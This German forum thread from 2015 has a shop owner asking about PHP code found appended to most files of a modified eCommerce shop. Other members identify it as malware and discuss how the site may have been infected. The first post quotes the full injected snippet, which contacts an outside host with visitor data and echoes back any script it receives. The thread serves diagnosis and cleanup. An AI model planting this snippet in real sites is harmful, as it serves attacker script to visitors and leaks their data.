Neuigkeiten
  • Die modified eCommerce Shopsoftware ist kostenlos, aber nicht umsonst.
    Spenden
  • Damit wir die modified eCommerce Shopsoftware auch zukünftig kostenlos anbieten können:
    Spenden
  • Thema: Plötzlich Schadcode ????

    svenyo

    • Mitglied
    • Beiträge: 211
    Plötzlich Schadcode ????
    am: 28. April 2015, 17:25:44
    Hallo,

    wir wollten soeben unseren Shop von Strato zu 1&1 umziehen. Haben alle Dateien lokal per FTP auf den Rechner gespeichert und danach bei 1&1 erneut hochgeladen. Jetzt wurde der Großteil der Dateien auf CHMOD 200 gesetzt, da anscheinden ein Schadcode enthalten sein soll.

    Nach Überprüfung entsprechender Dateien, konnten wir lediglich folgenden Code ausfindig machen, der in den entsprechenden Dateien laut FTP-Änderungsdatum am selben Tag um die gleiche Uhrzeit aufgetaucht ist:

    Code: PHP  [Auswählen]

    <?php
    #94b2b9#
    error_reporting(0); @ini_set('display_errors',0); $wp_c4 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_c4) && !preg_match ('/bot/i', $wp_c4))){

    $wp_c094="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_c4);

    if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_c094); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    $wp_4c = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_4c = @file_get_contents($wp_c094);}

    elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_4c=@stream_get_contents(@fopen($wp_c094, "r"));}}

    if (substr($wp_4c,1,3) === 'scr'){ echo $wp_4c; }
    #/94b2b9#
    ?>

     

    Kann mir jemand sagen wo das herkommt und wie ich es wieder wegbekomme?

    Gruß,
    Sven

    Linkback: https://www.modified-shop.org/forum/index.php?topic=32839.0

    Pfeiffer

    • Neu im Forum
    • Beiträge: 45
    Re: Plötzlich Schadcode ????
    Antwort #1 am: 28. April 2015, 17:49:28
    Sieht irgendwie nach WordPress aus, war bei Strato noch eine andere Webseite gehostet?

    svenyo

    • Mitglied
    • Beiträge: 211
    Re: Plötzlich Schadcode ????
    Antwort #2 am: 28. April 2015, 17:59:16
    Es sind noch mehrere Websites auf dem gleichen Webspace. Aber nur normale HTML-Seiten in separaten Ordnern mit eigenen Domains.

    Das Komische ist, dass die betroffenen Dateien des Shops plötzlich alle als "Geändert Datum" den 24.03.2015 14:34 Uhr oder 14:35 Uhr ... eingetragen haben.

    webald

    • modified Team
    • Beiträge: 2.791
    Re: Plötzlich Schadcode ????
    Antwort #3 am: 28. April 2015, 18:47:31
    Mir ist das ein bißchen zu unkonkret.
    Es sind noch mehrere Websites auf dem gleichen Webspace. Aber nur normale HTML-Seiten in separaten Ordnern mit eigenen Domains.
    Alles statisches HTML? Keine Formulare? Kein Javascript? Kein PHP?

    wir wollten soeben unseren Shop von Strato zu 1&1 umziehen. Haben alle Dateien lokal per FTP auf den Rechner gespeichert und danach bei 1&1 erneut hochgeladen.
    Was habt Ihr am Shop geändert? Könnte Ihr neu installieren und nur die Datenbank übernehmen?

    Welche Dateien sind betroffen? Habt Ihr eine ältere Version oder sind alle aktuellen Fixes installiert worden?

    svenyo

    • Mitglied
    • Beiträge: 211
    Re: Plötzlich Schadcode ????
    Antwort #4 am: 28. April 2015, 18:55:37
    Hallo,

    die anderen Websites sind alle statische HTML-Seiten. Kein Java, Kein PHP. Keine Formulare. Lediglich ein kleines Flash-Intro.

    Der Shop lief seit ungefähr 6-8 Monaten auf Strato ohne Probleme. Seither wurde auch keine Änderung mehr vorgenommen. Lediglich Artikel hinzugefügt bzw. entfernt.
    Aufgrund von Performance-Problemen möchten wir nun auf einen Managed Sever umziehen.

    Shop Version ist 1.06-r4642 mit ein paar kleinen Änderungen. Lediglich eine Neu-Installation und Datenbank importieren ist also nur mit ein wenig Aufwand möglich.

    Matt

    • Experte
    • Beiträge: 4.241
    Re: Plötzlich Schadcode ????
    Antwort #5 am: 28. April 2015, 19:31:34
    Wer hat denn automatisiert gesperrt? Strato oder 1&1?

    Ist das der Originalcode, den du gepostet hast? Die darin aufgerufene Domain scheint keinen Schadcode auszuliefern.

    Auf den anderen Domains liegen auch keine Installationen von Wordpress/Shop/etc., die nicht benutzt werden? Solche vergessenen Installationen sind gern mal Einfallstor für Schadsoftware.

    Dein Rechner ist sauber?

    Das einfachste ist natürlich ein nicht kompromittiertes Backup zu nehmen und einzuspielen. Davor muss aber natürlich das Einfallstor gefunden und geschlossen werden.

    svenyo

    • Mitglied
    • Beiträge: 211
    Re: Plötzlich Schadcode ????
    Antwort #6 am: 28. April 2015, 19:45:24
    1&1 hat automatisch gesperrt.

    Bei Strato ist der Shop immer noch ohne Probleme (außer die Ladezeiten) in Betrieb.

    Der gepostete Code ist der original-Code, der an den Dateien überall ganz unten angehängt ist.
    Rechner ist Sauber.

    Matt

    • Experte
    • Beiträge: 4.241
    Re: Plötzlich Schadcode ????
    Antwort #7 am: 28. April 2015, 19:54:05
    Das hab ich mir fast gedacht, dass 1&1 gesperrt hat. Findet sich denn der Schadcode dann auch auf dem Strato-Server so wieder?

    Pfeiffer

    • Neu im Forum
    • Beiträge: 45
    Re: Plötzlich Schadcode ????
    Antwort #8 am: 28. April 2015, 19:56:18
    Das hab ich mir fast gedacht, dass 1&1 gesperrt hat. Findet sich denn der Schadcode dann auch auf dem Strato-Server so wieder?
    Da würde ich drauf wetten, das würde auch die miesen Ladezeiten erklären.

    svenyo

    • Mitglied
    • Beiträge: 211
    Re: Plötzlich Schadcode ????
    Antwort #9 am: 28. April 2015, 20:26:40
    Ja, der Code ist bei den Dateien auf dem Strato Server vorhanden.

    Ich habe die von mir veränderten Dateien zusätzlich auf meinem Rechner gesichert. In weiser Voraussicht, falls einmal eine Neuinstallation notwendig sein sollte. Deshalb ist mir auch der zusätzliche "Code-Schnipsel" aufgefallen.

    Handelt es sich hier wirklich um Schadcode? Oder wo kommt das her?

    hpzeller

    • Experte
    • Beiträge: 4.129
    • Geschlecht:
    Re: Plötzlich Schadcode ????
    Antwort #10 am: 28. April 2015, 21:13:48
    Hallo svenyo

    Ja bei dem von dir geposteten Code handelt es sich um Schadcode!

    Es wird versucht eine Verbindung mit Parameterübergabe zu 'http://themeheader.com' herzustellen und deren Antwort gegebenenfalls im Browser auszugeben.

    Siehe auch hier –> http://stackoverflow.com/questions/24374357/php-hack-what-is-this-code-doing

    PS:
    Die wichtige Frage, die es zu beantworten gilt ist aber wie wurde dein Shop gehackt.

    Gruss
    Hanspeter

    Pfeiffer

    • Neu im Forum
    • Beiträge: 45
    Re: Plötzlich Schadcode ????
    Antwort #11 am: 28. April 2015, 21:21:03
    Svenyo schau mal bei Strato auch in deine anderen Ordner bzw. Domains und du wirst festellen daß der Code sich dort ebenfalls eingenistet hat. Ich würde wetten daß da noch irgendwo eine vergessene uralte Joomla oder Wordpress Installation zu finden ist. Dann wurde wahrscheinlich diese Sicherheitslücke zum hochladen genutzt und alle Ordner deines Webspaces infiziert. Wenn du jetzt bei 1&1 nur noch deinen Shop am laufen hast, bereinige die Dateien und du brauchst dir keine Sorgen mehr machen, weil ja die Hintertür weg ist.

    svenyo

    • Mitglied
    • Beiträge: 211
    Re: Plötzlich Schadcode ????
    Antwort #12 am: 28. April 2015, 21:24:59
    Hallo Hanspeter,

    danke für deine Antwort. Aber wo kommt dieser Schadcode her? Es wurden nur CSV-Dateien mit Artikeldaten importiert. Kann man das irgendwo nachvollziehen?
    Denn das komische ist, dass es plötzlich an fast allen PHP-Dateien so aussieht. Kann es irgendein Strato-Plugin oder sowas sein, dass mal versehentlich eingeschaltet wurde oder ähnliches?

    Gruß,
    Sven

    svenyo

    • Mitglied
    • Beiträge: 211
    Re: Plötzlich Schadcode ????
    Antwort #13 am: 28. April 2015, 22:51:44
    Habe im Forum gerade diesen Thread gefunden:

    http://www.modified-shop.org/forum/index.php?topic=30636.0

    Ich bin also nicht alleine. Fragt sich jetzt wirklich wie der Schädling in den Shop kam. Hat jemand ne Idee wie man das rausfinden kann?

    matchangler

    • Fördermitglied
    • Beiträge: 30
    • Geschlecht:
    Re: Plötzlich Schadcode ????
    Antwort #14 am: 28. April 2015, 23:22:31
    Hallo Sven,

    Wir hatten das Problem auch schon mal. bei uns lag es letztendlich am Filezilla - dem FTP Übertragungsprogramm. Wir hatten unwissentlich eine manipulierte Datei/Update von der Herstellerseite geladen. Details dazu gibts auf der Heise Seiite http://www.heise.de/security/meldung/Trojanisierte-FileZilla-Version-greift-Zugangsdaten-ab-2099232.html.

    Dadurch konnten im Dateirechte manipuliert werden. Die Zugangsdaten speichert Filezilla dubioser Weise im Klartext ab... Wir sind dann auf ein commerzielles FTP-Programm gewechselt. Seit ist Ruhe mit den gehackten Webseiten.

    Ich hoffe es hilft auch anderen betroffenen Shop-Betreibern. vg Maik
    10 Antworten
    6123 Aufrufe
    15. Juli 2014, 21:55:34 von ado
    6 Antworten
    4114 Aufrufe
    27. Juni 2016, 14:10:39 von andrewx
    4 Antworten
    2828 Aufrufe
    27. November 2012, 12:03:34 von h-h-h
    4 Antworten
    2623 Aufrufe
    30. November 2014, 23:33:48 von hendrik
               
    anything